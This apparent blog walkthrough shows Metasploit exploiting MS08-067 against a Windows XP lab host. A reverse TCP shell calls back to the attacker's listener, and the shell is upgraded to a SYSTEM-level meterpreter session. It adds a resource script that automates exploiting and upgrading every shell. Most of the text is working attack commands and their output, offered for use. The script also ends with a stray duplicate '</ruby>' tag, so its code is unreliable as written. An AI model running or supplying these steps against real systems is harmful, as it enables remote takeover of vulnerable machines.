Seeing is believing 🙂
```
root@bt:~# msfconsole

       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 707 exploits - 359 auxiliary - 57 post
+ -- --=[ 225 payloads - 27 encoders - 8 nops
       =[ svn r13065 updated today (2011.06.29)

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(ms08_067_netapi) > set lhost 192.168.96.1
lhost => 192.168.96.1
msf exploit(ms08_067_netapi) > set rhost 192.168.96.129
rhost => 192.168.96.129
msf exploit(ms08_067_netapi) > set lport 443
lport => 443
msf exploit(ms08_067_netapi) > exploit -z

[*] Started reverse handler on 192.168.96.1:443
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.96.1:443 -> 192.168.96.129:1094) at 2011-06-30 00:47:32 +0700
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type           Information                                                                                             Connection
  --  ----           -----------                                                                                             ----------
  1   shell windows  Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>  192.168.96.1:443 -> 192.168.96.129:1094
```
Good, the command shell is sitting in the background now. What if we want to turn that existing command shell session into a meterpreter session? Re-exploit? No, forget about re-exploiting: Metasploit can upgrade an existing command shell session to a meterpreter session in place. Look at the -u option in the sessions help. Let's try it.
```
msf exploit(ms08_067_netapi) > sessions -h
Usage: sessions [options]

Active session manipulation and interaction.

OPTIONS:

    -K  Terminate all sessions
    -c  Run a command on the session given with -i, or all
    -d  Detach an interactive session
    -h  Help banner
    -i  Interact with the supplied session ID
    -k  Terminate session
    -l  List all active sessions
    -q  Quiet mode
    -r  Reset the ring buffer for the session given with -i, or all
    -s  Run a script on the session given with -i, or all
    -u  Upgrade a win32 shell to a meterpreter session
    -v  List verbose fields

msf exploit(ms08_067_netapi) > sessions -u 1
[*] Started reverse handler on 192.168.96.1:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.96.129
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(ms08_067_netapi) > [*] Meterpreter session 2 opened (192.168.96.1:443 -> 192.168.96.129:1095) at 2011-06-30 00:48:12 +0700
```
Well, the new meterpreter session is now on the session list, and the original command shell is still there too 😉
```
msf exploit(ms08_067_netapi) > sessions -l

Active sessions
===============

  Id  Type                   Information                                                                                             Connection
  --  ----                   -----------                                                                                             ----------
  1   shell windows          Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. C:\WINDOWS\system32>  192.168.96.1:443 -> 192.168.96.129:1094
  2   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ XP_FDCC                                                                           192.168.96.1:443 -> 192.168.96.129:1095

msf exploit(ms08_067_netapi) > sessions -i 2
[*] Starting interaction with 2...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
```
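Typing `sessions -u 1` by hand is fine when you can see that the shell got id 1; in a resource script run with `msfconsole -r` you cannot assume that. The following is an added example, not part of the original post and not Metasploit's own code: a resource script that replays the exploit above and then upgrades every plain command-shell session it finds, whatever its id, by iterating `framework.sessions` inside a `<ruby>` block. The addresses and port are the ones from the post. Assumptions worth stating: the Ruby calls (`framework.sessions`, the session's `type`, `run_single`, `print_status`) are the ones resource scripts expose, and the type string `'shell'` is taken to be what the `Type` column of `sessions -l` reports for a command shell. As the help text says, `-u` upgrades a win32 shell only, so the script filters on type and leaves platform checking to Metasploit.

```text
# upgrade_shells.rc  (added example; run with: msfconsole -r upgrade_shells.rc)
# Same exploit, payload and options as the walkthrough above.
use exploit/windows/smb/ms08_067_netapi
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.96.1
set RHOST 192.168.96.129
set LPORT 443
# -z: do not interact, just background the session once it is opened.
exploit -z
sessions -l

<ruby>
# Collect the ids first: upgrading adds new sessions to the hash while we work.
# Assumption: command shells report type 'shell' (the Type column above shows
# "shell windows" for session 1 and "meterpreter x86/win32" for session 2).
shell_ids = framework.sessions.select { |sid, s| s.type == 'shell' }.map { |sid, _| sid }

if shell_ids.empty?
  print_status("No command shell session to upgrade")
else
  shell_ids.each do |sid|
    print_status("Upgrading shell session #{sid} to meterpreter")
    # Exactly what the post types by hand as 'sessions -u 1'.
    run_single("sessions -u #{sid}")
  end
end
</ruby>

sessions -l
</ruby>
```

One caveat a practitioner should take from the log above before automating this: each upgrade pushes a 102108-byte stager through the command shell in 1699-byte chunks, that is, roughly sixty separate commands executed on the target, followed by a 752128-byte meterpreter stage. It works, but it is slow and leaves a lot of command-line noise behind, so upgrade only the shells you actually need.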
Nice feature, good job Metasploit team 😉